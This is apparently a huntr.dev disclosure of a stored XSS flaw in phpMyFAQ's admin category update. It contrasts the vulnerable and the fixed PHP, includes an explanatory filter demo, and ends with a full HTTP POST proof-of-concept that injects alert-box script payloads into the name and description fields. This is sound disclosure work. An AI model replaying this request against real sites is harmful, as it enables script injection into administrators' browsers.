huntr / hatlesswizard / 1DC7F818-C8EA-4F80-B000-31B48A426334
History: Mar 08, 2023 - 8:19 p.m.

Stored XSS @ updatecategory

2023-03-08 20:19:28
hatlesswizard
www.huntr.dev
14
stored xss
updatecategory
user-controllable input

EPSS

0.001

Percentile

23.3%

Description

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Proof of Concept

Code that has the vulnerability:

// Updates an existing category
if ($action === 'updatecategory' && Token::getInstance()->verifyToken('update-category', $csrfToken)) {
    $category = new Category($faqConfig, [], false);
    $category->setUser($currentAdminUser);
    $category->setGroups($currentAdminGroups);

    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
    $categoryId = Filter::filterInput(INPUT_POST, 'id', FILTER_VALIDATE_INT);
    $categoryLang = Filter::filterInput(INPUT_POST, 'catlang', FILTER_UNSAFE_RAW);
    $existingImage = Filter::filterInput(INPUT_POST, 'existing_image', FILTER_UNSAFE_RAW);
    $image = count($uploadedFile) ? $categoryImage->getFileName(
        $categoryId,
        $categoryLang
    ) : $existingImage;

    $categoryData = [
        'id' => $categoryId,
        'lang' => $categoryLang,
        'parent_id' => $parentId,
        // 'name' and 'description' are stored exactly as submitted (FILTER_UNSAFE_RAW
        // does not encode < > & " '), so markup in them reaches the admin pages intact
        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_UNSAFE_RAW),
        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_UNSAFE_RAW),
        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
        'image' => $image,
        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT),
    ];

Code without that vulnerability:

// Save a new category
if ($action === 'savecategory' && Token::getInstance()->verifyToken('save-category', $csrfToken)) {
    $category = new Category($faqConfig, [], false);
    $category->setUser($currentAdminUser);
    $category->setGroups($currentAdminGroups);
    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
    $categoryId = $faqConfig->getDb()->nextId(Database::getTablePrefix() . 'faqcategories', 'id');
    $categoryLang = Filter::filterInput(INPUT_POST, 'lang', FILTER_UNSAFE_RAW);
    $categoryData = [
        'lang' => $categoryLang,
        // Here the same two fields go through FILTER_SANITIZE_SPECIAL_CHARS, which
        // converts < > & " ' to HTML entities before the values are stored
        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_SANITIZE_SPECIAL_CHARS),
        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_SANITIZE_SPECIAL_CHARS),
        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
        'image' => $categoryImage->getFileName($categoryId, $categoryLang),
        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT)
    ];
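The following PHP is an added example, not phpMyFAQ's own code: it runs the two payloads from the request below through the two filter flags that differ between the vulnerable and the fixed branch, then renders each stored row through a template that trusts the database and one that encodes at output. The template strings and helper names are constructed for this example.

```php
<?php
// Added example (not phpMyFAQ code): how FILTER_UNSAFE_RAW and
// FILTER_SANITIZE_SPECIAL_CHARS treat the PoC payloads, and why the
// output-encoding layer is what decides whether the script runs.

// Constructed copy of the 'name' and 'description' fields from the PoC request.
$post = [
    'name'        => '<script>alert(1)</script>',
    'description' => '</textarea><script>alert(2)</script>',
];

// Apply one filter flag to both fields, mirroring Filter::filterInput() usage.
function filterFields(array $post, int $filter): array
{
    return [
        'name'        => filter_var($post['name'], $filter),
        'description' => filter_var($post['description'], $filter),
    ];
}

// Edit-form template that trusts the stored row: the stored XSS sink.
function renderUnescaped(array $row): string
{
    return "<input name=\"name\" value=\"{$row['name']}\">\n"
         . "<textarea name=\"description\">{$row['description']}</textarea>\n";
}

// Same template, but every value is entity-encoded when it is written out.
function renderEscaped(array $row): string
{
    $name = htmlspecialchars($row['name'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $desc = htmlspecialchars($row['description'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<input name=\"name\" value=\"{$name}\">\n"
         . "<textarea name=\"description\">{$desc}</textarea>\n";
}

// A literal <script start tag in the final HTML means the payload would execute.
function hasLiveScript(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$rows = [
    'unsafe_raw'     => filterFields($post, FILTER_UNSAFE_RAW),
    'sanitize_chars' => filterFields($post, FILTER_SANITIZE_SPECIAL_CHARS),
];
foreach ($rows as $filterName => $row) {
    foreach (['renderUnescaped', 'renderEscaped'] as $renderer) {
        // Only unsafe_raw + renderUnescaped yields YES; the other three combinations are no.
        printf("%-14s + %-15s live script: %s\n", $filterName, $renderer,
               hasLiveScript($renderer($row)) ? 'YES' : 'no');
    }
}
```

The sanitize_chars row rendered through renderEscaped() comes out double-encoded (`&amp;#60;script...`), which is the usual reason to encode once at output rather than on input.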

Request:

POST /admin/?action=updatecategory HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=EDITthis; pmf_sid=11; cookieconsent_status=dismiss
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14208207025422371582565391486
Content-Length: 1934
Origin: https://roy.demo.phpmyfaq.de
Referer: https://roy.demo.phpmyfaq.de/admin/?action=editcategory&cat=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="id"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="catlang"

en
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="parent_id"

0
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="csrf"

EDITthis
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="existing_image"


-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="name"

<script>alert(1)</script>
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="description"

</textarea><script>alert(2)</script>
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="active"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="show_home"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="user_id"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="grouppermission"

all
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="userpermission"

all
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="restricted_users"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="submit"


-----------------------------14208207025422371582565391486--
